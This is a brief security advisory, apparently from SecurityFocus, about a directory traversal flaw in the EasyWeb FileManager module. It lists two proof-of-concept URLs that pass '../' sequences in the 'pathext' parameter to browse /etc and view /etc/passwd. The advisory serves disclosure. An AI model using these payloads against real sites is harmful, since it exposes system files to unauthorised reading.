EasyWeb FileManager Module Directory Traversal Vulnerability

No exploit is required.

The following proof of concept is available:
/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc

/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd


 

Privacy Statement
Copyright 2010, SecurityFocus